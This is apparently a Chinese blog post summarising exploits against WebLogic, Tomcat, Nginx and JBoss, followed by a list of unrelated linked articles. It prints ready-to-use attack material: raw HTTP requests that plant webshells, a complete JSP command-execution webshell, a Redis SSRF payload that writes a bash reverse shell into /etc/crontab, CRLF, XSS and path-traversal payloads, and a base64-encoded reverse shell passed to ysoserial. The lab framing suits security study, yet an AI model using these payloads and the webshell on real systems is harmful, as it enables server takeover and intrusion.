爱上卿Ooo
爱上卿Ooo

常见中间件漏洞总结


1. Weblogic常见漏洞
2. Tomcat常见漏洞
3. Nginx常见漏洞
4. JBOSS常见漏洞


中间件简介
中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种
软件在不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统
之上,管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统
的软件。相连接的系统,即使它们具有不同的接口,但通过中间件相互之
间仍能交换信息。执行中间件的一个关键途径是信息传递。通过中间件,
应用程序可以工作于多平台或OS环境。
1.一般本地开发的话,小项目,或者是个人开发建议使用tomcat。
2.linux系统建议使用jetty或apache hpptd
3.大型的项目就用JBOSS或webloigc
4.大项目或者商业项目一般采用:weblgoic/webshere,其他的还有jboss、
glasshfish等
5.一些示例项目或者小项目常采用jetty
6.tomcat , jboss, weblogic, nginx,websphere为常见中间件。
Weblogic 常见漏洞
WebLogic常用端口7001/7002,常见漏洞有弱口令导致上传任意war包、SSRF
漏洞、任意文件上传和反序列化漏洞。
默认访问路径:http://your-ip:port/console/login/LoginForm.jsp
weblogic反序列化漏洞
基于Weblogic t3协议引起远程代码执行的反序列化漏洞全家福:
CVE-2015-4852
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2628
基于wls-wsat服务组件的引起远程代码执行的反序列化漏洞:
CVE-2017-3506
CVE-2017-10271
任意文件上传漏洞:
CVE-2018-2894
wls-wsat XMLDecoder  反序列化漏洞(CVE-2017-10271) )
Weblogic的WLS Security组件对外提供webservice服务,其中使
用了XMLDecoder来解析用户传入的XML数据,在解析的过程中
出现反序列化漏洞,导致可执行任意命令。
影响范围:
Oracle WebLogic Server 10.3.6.0.0版本
Oracle WebLogic Server 12.1.3.0.0版本
Oracle WebLogic Server 12.2.1.1.0版本
1、访问http://172.16.222.142:7001/即可看到一个404页面,说
明weblogic已成功启动。
2、访问: http://172.16.222.142:7001/wls-wsat/CoordinatorPortT
ype,抓包,写入shell。
访问: http://172.16.222.142:7001/bea_wls_internal/test.jsp
工具:weblogic XML反序列化检查工具
weblogic_wls_wsat_exp_win.py
命令: python .\weblogic_wls_ws
at_exp_win.py -t 172.16.222.142:7001 -c ifconfig
'wls-wsat' XMLDecoder  反序列化漏洞(CVE-2017-10271) )
POST /wls-wsat/CoordinatorPortTypeHTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638





servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp<
/string>

<% out.print("test"); %>
]]>
Weblogic Web Service Test Page中两处任意文件上传漏洞,两个页面分别为
/ws_utc/begin.do,/ws_utc/config.do
Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限
制.
漏洞的影响范围 Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,
12.2.1.3
漏洞复现:(1)http://172.16.222.142:7001/ws_utc/config.do
设置Work Home Dir为
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp
/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限。
(2)然后点击安全 -> 增加,然后上传webshell。
上传后,查看返回的数据包,其中有时间戳
然后访问http:// 172.16.222.142:7001 /ws_utc/css/config/keystore/[时间戳]_[文件名],
即可执行webshell
Weblogic  任意文件上传漏洞(CVE-2018-2894) )
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP
请求,进而攻击内网中redis、fastcgi等脆弱组件。
漏洞版本:10.0.2, 10.3.6
(1)SSRF漏洞存在于
http://172.16.222.64:7001/uddiexplorer/SearchPublicRegistries.jsp。
访问: http://your-
ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&
txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business
+location&btnSubmit=Search&operator=http://127.0.0.1:7001
通过operator可进行内网端口探测。
可访问的端口将会得到错误,一般是返回status code(如下
图),如果访问的非http协议,则会返回did not have a valid
SOAP content-type
如果不存在,返回:
Weblogic SSRF服务器端请求伪造CVE-2014-
4210
Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过
传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也
就说我们可以通过该SSRF攻击内网中的redis服务器。
(1)首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),发
现172.18.0.2:6379可以连通。
(2)
发送三条redis命令,将shell脚本写入/etc/crontab:
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
Save
进行URL编码,换行符是“\r\n”,也就是“%0D%0A”。放在服务器后边即可。
/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20ro
ot%20bash%20-
i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn
%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20c
rontab%0D%0Asave%0D%0A%0D%0Aaaa
Weblogic SSRF getshell
Weblogic SSRF
Ubuntu服务器反弹shell:sudonc -l –p 21
常见攻击方法:
1、默认口令、弱口令,爆破,tomcat5 默认有两个角色:tomcat和role1。
其中账号both、tomcat、role1的默认密码都是tomcat。
2、在管理后台部署 war 后门文件
3、远程代码执行漏洞
默认访问路径:http://localhost:8080
Tomcat 简介
访问http://172.16.222.64:8080即可看到Tomcat的Example页面。
(conf/web.xml配置readonly属性,将默认参数true改为false
(Tomcat默认开启put方法,可采用nmap和options方法测试是否开启put方法):
漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
访问http://172.16.222.64:8080即可看到Tomcat的Example页面。
(conf/web.xml配置readonly属性,将默认参数true改为false
(Tomcat默认开启put方法,可采用nmap和options方法测试是否开启put方法)
Tomcat对文件后缀有一定检测(不能直接写jsp),
我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制
直接发送以下数据包即可在Web根目录写入shell:
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
Getshell脚本
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public
static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro =
Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new
InputStreamReader(pro.getInputStream()));String temp = null;while ((temp =
buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e)
{line.append(e.getMessage());}return
line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.get
Parameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
"
);}else{out.println(":-)");}%>
访问:http://172.16.222.64:8080/2.jsp 命令执行?pwd=023&cmd=whoami
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
Nginx越界读取缓存漏洞(CVE-2017-7529)
Nginx在反向代理站点(反向代理(Reverse Proxy)方式是指以代理服务器来接受
Internet上的连接请求,然后将请求转发给内部网络上的服务器)的时候,通常会将一
些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括
“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,
则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。
影响版本:Nginx 0.5.6 – 1.13.2
如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度
的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读
取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件
中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
调用python3 poc.py http://your-ip:8080/,读取返回结果,发现越界读取到了位于
“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容
Nginx解析漏洞nginx_parsing_vulnerability
Nginx 解析漏洞。
Nginx 1.x 最新版,PHP 7.x最新版,该漏洞与Nginx、php版本无关,属于用户配置不当
造成的解析漏洞
1.访问http://172.16.222.64/uploadfiles/nginx.png和http://172.16.222.64/uploadfiles/ngin
x.png/.php即可查看效果。
增加/.php后缀,被解析成PHP文件
如果开启了fix_pathinfo这个选项,那么就会触发在PHP中的如下逻辑。
PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinfo.j
pg作为PHP文件来解析了
2。访问http://172.16.222.64/index.php测试上传功能,上传代码不存在漏洞,但利用
解析漏洞即可getshell。
Nginx配置错误导致漏洞
Nginx CRLF注入。
Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。
错误的配置文件示例(原本的目的是为了让http的请求跳转到https上):
location / {
return 302 https://$host$uri;
}
会话定置: http://172.16.222.64:8080/%0a%0dSet-Cookie:%20a=1,可注入Set-Cookie头,
反射性XSS:/%0D%0A%0D%0A%3Cimg%20src=1%20οnerrοr=alert(/xss/)%3E
Nginx配置错误导致漏洞
Nginx目录穿越漏洞。
Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。
错误的配置文件示例:
location /files /{
alias /home/;
}
Payload: http://172.16.222.64:8081/files../ ,成功穿越到根目录:
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
该漏洞为 Java反序列化错误类型,存在于 Jboss的 HttpInvoker组件中的
ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来
自客户端的数据流进行反序列化,从而导致漏洞。初始化完成后访问
http://172.16.222.64:8080/即可看到JBoss默认页面。漏洞出现在/invoker/readonly请求
中,服务器将用户提交的POST内容进行了Java反序列化。
编写反弹shell的命令 :bash –i>& /dev/tcp/10.0.0.1/21 0>&1
我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等
bash需要的方法,我们需要用进行一次编码。
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-
d}|{bash,-i}
工具:http://jackson.thuraisamy.me/runtime-exec-payloads.html
使用ysoserial来复现生成序列化数据,生成好的POC即为poc.ser。
java -jar ysoserial.jar CommonsCollections5 "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" >
poc.ser
将这个文件作为POST Body发送至/invoker/readonly即可反弹shell。
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
 

你可能感兴趣的:(常见中间件漏洞总结)

  • Nginx 中启用 Gzip 压缩以优化网页加载速度 神秘泣男子 Linux高级管理#运维nginx优化
    作者主页:点击!Nginx-从零开始的服务器之旅专栏:点击!Linux高级管理防护和群集专栏:点击!⏰️创作时间:2025年2月7日17点14分目录1.配置网页压缩目的操作步骤检查gzip模块是否启用测试步骤1.gzipon;2.gzip_types3.gzip_min_length4.gzip_comp_level总结启用Gzip压缩是一种简单高效的优化方法,可以显著减少网页传输的数据量,从而提
  • 机柜机箱制冷风扇在使用过程中突然停止运转的原因 辉盈防爆散热风扇 单片机嵌入式硬件
    在机柜机箱的正常运行中,制冷风扇起着关键的散热作用,可一旦它在使用时突然停止运转,将会对机柜机箱内设备的稳定运行构成严重威胁。而导致这一现象出现的原因较为复杂,主要涵盖以下几个方面。从电源供应角度来看,这是一个常见的导致风扇停转的因素。电源连接松动是很容易出现的问题。机柜机箱在长期使用过程中,可能会因为震动等原因,使得风扇的电源线接口松动甚至脱落,从而切断了风扇的电力供应,使其停止运转。此外,电源
  • 前端知识速记--css篇:CSS3中的常见动画及实现方式 无限大. #前端知识速记前端csscss3
    前端知识速记–css篇:CSS3中的常见动画及实现方式常见的CSS3动画1.过渡(Transitions)过渡是一种非常简单的动画效果,允许你在元素的状态变更时平滑过渡到新状态。语法格式:transition:propertydurationtiming-functiondelay;property:指定要过渡的CSS属性,例如background-color。duration:过渡的持续时间,例
  • MySQL底层原理学习 jiqiren1994 #mysqlmysql数据库database
    一、MySQL体系架构MySQLServer架构自顶向下大致可以分网络连接层、服务层、存储引擎层和系统文件层。1.网络连接层客户端连接器(ClientConnectors):提供与MySQL服务器建立的支持。目前几乎支持所有主流的服务端编程技术,例如常见的Java、C、Python、.NET等,它们通过各自API技术与MySQL建立连接。2.服务层(MySQLServer)服务层是MySQLSer
  • 自动化测试常见问题详解 测试老哥 测试用例软件测试自动化测试职场和发展测试工具python接口测试
    点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快选择适合自己的,落地应用,是当下我们应该做的。目前国内的互联网行业,大环境来说,还处在一个快速发展,需要流程化标准化的时期,如何跟上不断变幻发展的节奏,除了不断了解接触新的东西,还需要不断学习,提升自身,以内在的驱动力,去紧跟时代浪潮。即使做不了弄潮儿,也不能变成时代淘汰的那一批。一、自动化测试简介1、为什么要进行自动化测试?①黑盒测试回
  • ORB-SLAM3的源码学习: Settings.cc:Settings::readImageInfo读取图像信息 PaLu-LvL 计算机视觉#ORB-SLAM3计算机视觉opencvubuntuc++人工智能学习
    前言简单总结一下:这个函数的主要目的是从配置文件中读取和设置与相机图像尺寸相关的各种参数。它会根据需要调整图像的宽度和高度,并根据这些调整更新相机的校准参数。如果是立体相机或带IMU的相机,还会同时更新第二个相机的校准参数。最终,这些调整确保图像和相机校准信息的一致性。1.函数声明voidSettings::readImageInfo(cv::FileStorage&fSettings)2.函数定
  • tar 压缩算法对比与实践指南 tar压缩效率linux建议
    在Linux系统管理和开发过程中,文件压缩打包是一项常见的需求。tar作为最常用的归档工具,支持多种压缩算法,不同算法之间在压缩比、压缩速度和解压速度等方面各有特点。本文将深入分析各种压缩算法的性能特征,并提供实用的选择建议。压缩算法性能对比我们选择了五种常用的压缩方式进行测试,包括:原始tar(无压缩)gzip压缩(tar.gz)xz压缩(tar.xz)zstd压缩(tar.zst)lz4压缩(
  • 基于TextInput的常见自定义效果解决方案
    场景描述场景一:英文、数字及特殊字符和中文字符自动间隔一个空格的距离场景二:当输入的内容(纯数字可能为小数)大于999时,禁止输入,注意最后一位光标不要闪烁场景三:限制两位小数,不能以小数点开头的场景场景四:TextInput如何在输入、粘贴、剪切动作之后,内容显示之前控制显示内容场景五:电话号码格式化时,删除号码中间的空格为删除前一位数字场景六:textInput防抖与节流场景一:TextInp
  • React 中props和state的区别 黑马嘎 react.js
    文章目录前言一、props用法二、给props设置一个默认值三、State和Props两者的区别总结前言state和props主要的区别在于props是不可变的,而state可以根据与用户交互来改变。这就是为什么有些容器组件需要定义state来更新和修改数据。而子组件只能通过props来传递数据。一、props用法classMyComponentextendsReact.Component{//此
  • Windows奇技淫巧之网络命令行 沉迷单车的追风少年 服务端编程计算机网络经验问题汇总windows网络
    写在前面:Linux老鸟会深度沉迷命令行,各种奇技淫巧心中涨,但是windows上的命令行相当好用,各种骚操作也是眼花缭乱。其中网络操作经常使用,本文做一个简单的总结。目录1、ipconfig:显示当前TCP/IP配置的设置值2、ping:测试目的站是否可达及相关状态3、arp:地址解析协议4、traceroute:路由跟踪5、route:操作路由表6、netstat:显示协议统计信息7、nbts
  • Vue2 与 Vue3 中 Computed 计算属性详解 阿贾克斯的黎明 前端vue.js前端javascript
    目录Vue2与Vue3中Computed计算属性详解一、Vue2中的Computed计算属性1.简单写法2.get和set写法二、Vue3中的Computed计算属性1.简单写法2.get和set写法三、总结在Vue开发中,计算属性(computed)是一个非常重要的特性,它可以对数据进行二次计算,为我们的开发带来了很大的便利。本文将结合Vue2和Vue3的特点,深入探讨computed计算属性,
  • Spring Batch批处理操作与实践 面朝大海,春不暖,花不开 基础管理后台开发springbatch前端
    SpringBatch是一个强大的批处理框架,专为处理大规模数据和执行复杂批处理任务而设计。它基于Spring框架构建,继承了Spring的许多优点,如依赖注入、事务管理等,同时提供了丰富的功能来简化批处理应用的开发。什么是批处理?批处理是指在后台运行的一系列操作,通常用于处理大量数据或执行长时间运行的任务。这些任务往往不需要用户交互,可以在非高峰时段运行,以减少对系统资源的影响。常见的批处理任务
  • 网络瓶颈分析与排查:性能测试中的隐秘敌人 测试不打烊 性能测试网络压力测试
    性能测试问题定位-网络瓶颈分析与案例解析在性能测试中,网络往往是性能瓶颈的一个关键因素。网络延迟、带宽、连接数等问题都可能影响系统的整体性能。在本文中,我们将结合性能测试的过程,从网络监控、常见的网络瓶颈问题以及如何使用Linux工具(如netstat、iftop、ping、traceroute等)进行详细的瓶颈定位。我们还会通过实际案例进行说明,帮助你更好地理解网络瓶颈的排查方法。1.网络瓶颈的
  • ch02离散仿真引擎基础——Unity3D学习 yesor_not 3D游戏学习c#unity游戏游戏策划
    ch02离散仿真引擎基础——Unity3D学习一、简答题1.解释游戏对象(GameObjects)和资源(Assets)的区别与联系游戏对象(GameObjects):一般为玩家,敌人,环境等资源(Assets):一般包括声音,脚本,材质等区别与联系:对象一般是一些资源的集合体资源可以被多个对象使用资源作为模版,可实例化游戏中具体的对象。2、下载几个游戏案例,分别总结资源、对象组织的结构(指资源的
  • vue h函数 月下第一风流 vue.jsjavascript前端
    在Vue.js中,h函数是用于在渲染函数中创建虚拟DOM元素的主要工具。但是,除了h函数之外,还有其他一些辅助函数和工具可以用于渲染函数和组件开发。以下是一些常见的工具和函数:createApp:用于创建Vue应用程序的实例。在Vue3中,这是启动应用的主要方法。defineComponent:用于定义一个组件。在Vue3中,这是一种定义组件的选项式API的替代方法。resolveComponen
  • 常见数据结构的简介(基本概念 & 操作 & 时间复杂度) 子诚之 编程
    文章目录0.概览1.线性表、栈和队列2.数组2.1基本操作1)时间复杂度2)案例3.字符串3.1存储结构3.2基本操作1)时间复杂度2)案例:最大公共字符串4.二叉树4.1储存结构4.2基本操作1)时间复杂度2)案例:使用字典树判断字符串是否存在5.哈希/散列表5.1哈希函数5.2基本操作1)时间复杂度2)案例:构建哈希表《重学数据结构与算法》学习笔记0.概览数据结构增删查特点线性表变长栈队列数组
  • 常见解题方法(位运算、双指针、前缀和) wibkb java排序算法快速排序
    目录位运算双指针前缀和对于自己刷题过程中遇到的一些常见简单解题方法进行了一个总结:数组在数据结构中是线性表的一种,在算法题中常常以整数数组和字符串等形式展现,其实数组中包含有更多的数据类型,这一段主要说明整数数组的一些常见问题解法;数组的一个特点,可以通过下标对于数据进行一个快速访问,即a[i]=xx;位运算本质上应该算在数学系算法的一大类,通过数组中的各个数进行一个位运算来获得最终的结果。位运算
  • Python随机森林算法详解与案例实现 闲人编程 python算法python随机森林数据分析人工智能
    目录Python随机森林算法详解与案例实现1、随机森林算法概述2、随机森林的原理3、实现步骤4、分类案例:使用随机森林预测鸢尾花品种4.1数据集介绍4.2代码实现4.3代码解释4.4运行结果5、回归案例:使用随机森林预测波士顿房价5.1数据集介绍5.2代码实现5.3代码解释5.4运行结果6、随机森林的优缺点7、改进方向8、应用场景9、总结Python随机森林算法详解与案例实现1、随机森林算法概述随
  • 【蓝桥杯C/C++】彻底理解双指针算法 不会喷火的小火龙 #蓝桥杯算法与数据结构算法数据结构c++
    目录学习目标什么是双指针?双指针的分类核心思想模板写法经典例题移除元素双指针法分析题意具体代码最长连续不重复子序列输入格式输出格式数据范围输入样例:输出样例:核心思路数组元素的目标和输入格式输出格式数据范围输入样例:输出样例:核心思路总结一下学习目标了解双指针算法是什么以及分类理解双指针算法的原理会用代码编写双指针算法在实际题目中灵活运用双指针在数组的开章中我们提到了这个算法,如果没有看的话可以学
  • 笔记-《A Survey of Large Language Models》- 尾声 L_serein 玩转LLM笔记语言模型人工智能
    尾声:尾声:本综述是由我们研究团队在一次讨论会上计划的,我们旨在总结LLM的最新进展,为我们的团队成员提供一份高度可读性的报告。第一稿于2023年3月13日完成,我们的团队成员尽最大努力以相对客观、全面的方式囊括有关LLM的相关研究。接着,我们进行了多次细致的写作和内容修订。尽管我们付出了巨大的努力,但这份综述仍远非完美:我们可能会遗漏重要的参考文献或主题,也可能存在不严谨的表述或讨论。由于空间有
  • 30.4:Python如何安装Pandas库? (课程共4100字) 小兔子平安 Python完整学习全解答pythonpandas开发语言
    课程概述(课程共4100字)①安装Pandas库打开命令提示符或终端窗口,输入以下命令来安装Pandas:当安装完成后,可以使用以下命令来验证Pandas是否已正确安装:②数据处理和分析读写数据数据清洗和预处理数据分组和聚合数据可视化③Python学习的深入讨论Python的应用领域Python的优点和缺点学习Python的建议学习Python的挑战课程总结课程概述Python是一种功能强大的编程
  • OpenWebUI,RAG+外部知识库+AI写文的开源应用 m0_74824780 人工智能开源
    引言自从去年AI火起来之后,很多人便热衷于寻找适合自用的AI开源项目,把各家大模型API接入到自己的AI程序里,便可以通过AI辅助完成一系列日常任务,比如内容翻译/润色/总结/撰写、格式转换、数据分类、代码分析、角色扮演等等。一般情况下,大模型依靠自身训练数据便能够完成的任务质量偏高,像翻译总结、格式转换之类,市面上所有的AI程序基本都能够满足这一点需求;但是需要结合外部资料/超长上文信息/实时信
  • 【Vim Masterclass 笔记10】S06L23:Vim 核心操作训练之 —— 文本的搜索、查找与替换操作(第二部分) 安冬的码畜日常 VimMasterclassvim笔记vim查找与替换
    文章目录S06L23Search,Find,andReplace-PartTwo1文本替换命令`:s/old/new/`2指定范围的文本替换3特例:路径的替换4文件行号的配置5要点总结(1)搜索当前行(SameLineSearching)(2)跨行搜索(Searching)(3)替换命令(SubstituteCommand)写在前面根据李笑来《自学是门手艺》的建议,梳理完知识要点后又对这章内容制作
  • ADS基础教程19 - 电磁仿真(EM)基本概念和实操 RunningCamel ADS仿真ADS仿真
    EM介绍一、引言二、基本概念1.EM介绍2.Momentum介绍3.FEM介绍4.Substrate介绍三、创建Layout并进行Momentum仿真1.创建Layout2.添加Microtrip(微带线)3.添加Substrate4.Momentum仿真四、总结一、引言本章节开始介绍EM的基本概念、内容以及实现具体步骤,并介绍如何在ADS中创建一个Layout,然后执行Momentum仿真过程。
  • Linux常见的性能优化策略 这多冒昧啊 linux服务器运维
    目录1.CPU性能优化:调整进程优先级2.内存优化:禁用透明大页3.磁盘I/O优化:切换I/O调度器4.网络优化:TCP缓冲区调优5.文件句柄优化:高并发API服务器策略总结:1.CPU性能优化:调整进程优先级场景描述:某跨境电商平台在“黑色星期五”大促期间,订单处理系统(Java服务)出现响应延迟。运维团队通过pidstat-u1发现名为log_aggregator的Python日志收集进程(P
  • RocketMQ 消息堆积了怎么解决 星辰@Sea 消息队列Javarocketmq
    目录引言消息堆积的原因RocketMQ的基本架构解决消息堆积的方法4.1扩大消费者规模4.2调整消息优先级4.3优化消费逻辑4.4消息重试与死信队列4.5监控与报警机制实现解决堆积的步骤5.1扩大消费者规模的配置5.2调整消息优先级的配置5.3优化消费逻辑的示例5.4消息重试与死信队列的配置5.5监控与报警机制的实现应用场景性能与扩展性考虑常见问题与解决方案总结参考资料1.引言在分布式系统中,消息
  • 谭浩强C语言程序设计(第五版)知识点总结(1) 锦翎掠霄 C语言c语言开发语言
    第一章程序设计和C语言1.1什么是计算机程序程序的定义:程序是一组计算机能识别和执行的指令,每条指令对应一个特定的操作。1.2什么是计算机语言1、计算机语言发展三阶段及特点对比维度机器语言(低级语言)汇编语言(低级语言)高级语言表现形式二进制代码(0/1组合)助记符(如ADD/SUB)自然语言+数学表达式(如PRINT*语句)硬件依赖性完全依赖特定机器强依赖特定机器弱依赖,跨平台执行效率最高(直接
  • 销售易NeoCRM与Salesforce:优势特色大比拼 saas
    在当今竞争激烈的CRM市场中,销售易NeoCRM作为国产CRM的代表,与全球领先的Salesforce展开了激烈的竞争。本文将从功能、用户体验、价格、市场评价以及适用场景等方面对这两款CRM系统进行对比总结和盘点。一、功能对比销售易NeoCRM:销售管理:提供从线索获取、商机管理到订单成交的完整销售漏斗管理,实现销售过程的标准化管理。客户管理:提供全方位的客户画像功能,记录和追踪客户的所有互动历
  • 解析Spring Boot中的数据库迁移工具 weixin_836869520 数据库springbootoracle
    解析SpringBoot中的数据库迁移工具大家好,我是微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!随着软件开发的持续迭代,数据库的结构和数据的变更是常见的需求。为了管理和执行这些变更,数据库迁移工具成为了开发过程中的重要组成部分。本文将深入探讨如何在SpringBoot项目中集成和使用数据库迁移工具,以及常见的最佳实践和注意事项。1.数据库迁移工具介绍数据库迁移工具是一种用于
  • 销售易NeoCRM与Salesforce:优势特色大比拼 saas
    在当今竞争激烈的CRM市场中,销售易NeoCRM作为国产CRM的代表,与全球领先的Salesforce展开了激烈的竞争。本文将从功能、用户体验、价格、市场评价以及适用场景等方面对这两款CRM系统进行对比总结和盘点。一、功能对比销售易NeoCRM:销售管理:提供从线索获取、商机管理到订单成交的完整销售漏斗管理,实现销售过程的标准化管理。客户管理:提供全方位的客户画像功能,记录和追踪客户的所有互动历
  • Enum用法 不懂事的小屁孩 enum
    以前的时候知道enum,但是真心不怎么用,在实际开发中,经常会用到以下代码: protected final static String XJ = "XJ"; protected final static String YHK = "YHK"; protected final static String PQ = "PQ";
  • 【Spark九十七】RDD API之aggregateByKey bit1129 spark
    1. aggregateByKey的运行机制   /** * Aggregate the values of each key, using given combine functions and a neutral "zero value". * This function can return a different result type
  • hive创建表是报错: Specified key was too long; max key length is 767 bytes daizj hive
    今天在hive客户端创建表时报错,具体操作如下   hive> create table test2(id string); FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask. MetaException(message:javax.jdo.JDODataSto
  • Map 与 JavaBean之间的转换 周凡杨 java自省转换反射
    最近项目里需要一个工具类,它的功能是传入一个Map后可以返回一个JavaBean对象。很喜欢写这样的Java服务,首先我想到的是要通过Java 的反射去实现匿名类的方法调用,这样才可以把Map里的值set 到JavaBean里。其实这里用Java的自省会更方便,下面两个方法就是一个通过反射,一个通过自省来实现本功能。 1:JavaBean类 1 &nb
  • java连接ftp下载 g21121 java
    有的时候需要用到java连接ftp服务器下载,上传一些操作,下面写了一个小例子。 /** ftp服务器地址 */ private String ftpHost; /** ftp服务器用户名 */ private String ftpName; /** ftp服务器密码 */ private String ftpPass; /** ftp根目录 */ private String f
  • web报表工具FineReport使用中遇到的常见报错及解决办法(二) 老A不折腾 finereportweb报表java报表总结
      抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。   出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。   1、没有返回数据集: 在存储过程中的操作语句之前加上set nocount on 或者在数据集exec调用存储过程的前面加上这句。当S
  • linux 系统cpu 内存等信息查看 墙头上一根草 cpu内存liunx
    1 查看CPU   1.1 查看CPU个数   # cat /proc/cpuinfo | grep "physical id" | uniq | wc -l   2   **uniq命令:删除重复行;wc –l命令:统计行数**   1.2 查看CPU核数   # cat /proc/cpuinfo | grep "cpu cores" | u
  • Spring中的AOP aijuans springAOP
      Spring中的AOP Written by Tony Jiang @ 2012-1-18 (转)何为AOP AOP,面向切面编程。 在不改动代码的前提下,灵活的在现有代码的执行顺序前后,添加进新规机能。 来一个简单的Sample: 目标类: [java]  view plain copy print ? package&nb
  • placeholder(HTML 5) IE 兼容插件 alxw4616 JavaScriptjquery jQuery插件
    placeholder 这个属性被越来越频繁的使用. 但为做HTML 5 特性IE没能实现这东西. 以下的jQuery插件就是用来在IE上实现该属性的. /** * [placeholder(HTML 5) IE 实现.IE9以下通过测试.] * v 1.0 by oTwo 2014年7月31日 11:45:29 */ $.fn.placeholder = function
  • Object类,值域,泛型等总结(适合有基础的人看) 百合不是茶 泛型的继承和通配符变量的值域Object类转换
    java的作用域在编程的时候经常会遇到,而我经常会搞不清楚这个 问题,所以在家的这几天回忆一下过去不知道的每个小知识点   变量的值域;   package 基础; /** * 作用域的范围 * * @author Administrator * */ public class zuoyongyu { public static vo
  • JDK1.5 Condition接口 bijian1013 javathreadConditionjava多线程
    Condition 将 Object 监视器方法(wait、notify和 notifyAll)分解成截然不同的对象,以便通过将这些对象与任意 Lock 实现组合使用,为每个对象提供多个等待 set (wait-set)。其中,Lock 替代了 synchronized 方法和语句的使用,Condition 替代了 Object 监视器方法的使用。 条件(也称为条件队列或条件变量)为线程提供了一
  • 开源中国OSC源创会记录 bijian1013 hadoopsparkMemSQL
    一.Strata+Hadoop World(SHW)大会         是全世界最大的大数据大会之一。SHW大会为各种技术提供了深度交流的机会,还会看到最领先的大数据技术、最广泛的应用场景、最有趣的用例教学以及最全面的大数据行业和趋势探讨。          二.Hadoop   &nbs
  • 【Java范型七】范型消除 bit1129 java
    范型是Java1.5引入的语言特性,它是编译时的一个语法现象,也就是说,对于一个类,不管是范型类还是非范型类,编译得到的字节码是一样的,差别仅在于通过范型这种语法来进行编译时的类型检查,在运行时是没有范型或者类型参数这个说法的。 范型跟反射刚好相反,反射是一种运行时行为,所以编译时不能访问的变量或者方法(比如private),在运行时通过反射是可以访问的,也就是说,可见性也是一种编译时的行为,在
  • 【Spark九十四】spark-sql工具的使用 bit1129 spark
    spark-sql是Spark bin目录下的一个可执行脚本,它的目的是通过这个脚本执行Hive的命令,即原来通过 hive>输入的指令可以通过spark-sql>输入的指令来完成。 spark-sql可以使用内置的Hive metadata-store,也可以使用已经独立安装的Hive的metadata store   关于Hive build into Spark
  • js做的各种倒计时 ronin47 js 倒计时
